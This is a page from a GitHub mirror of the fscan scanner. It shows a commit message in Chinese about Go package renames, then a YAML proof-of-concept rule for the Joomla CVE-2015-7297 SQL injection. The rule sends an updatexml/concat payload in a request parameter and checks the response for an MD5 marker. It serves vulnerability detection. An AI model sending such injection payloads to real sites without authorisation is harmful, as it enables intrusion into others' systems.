mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-09-14 14:06:44 +08:00

- 重命名 Common -> common,WebScan -> webscan,遵循 Go 包命名约定 - 修复模块路径大小写不匹配导致的编译错误 - 清理依赖项,优化 go.mod 文件 - 添加 Docker 测试环境配置文件 - 新增镜像拉取脚本以处理网络超时问题 - 成功编译生成 fscan v2.2.1 可执行文件 该修复解决了 Linux 系统下包名大小写敏感导致的模块解析失败问题。
10 lines
579 B
YAML
10 lines
579 B
YAML
name: poc-yaml-joomla-cve-2015-7297-sqli
|
|
rules:
|
|
- method: GET
|
|
path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)
|
|
expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2")
|
|
detail:
|
|
links:
|
|
- https://www.exploit-db.com/exploits/38797
|
|
- http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
|
|
- https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ |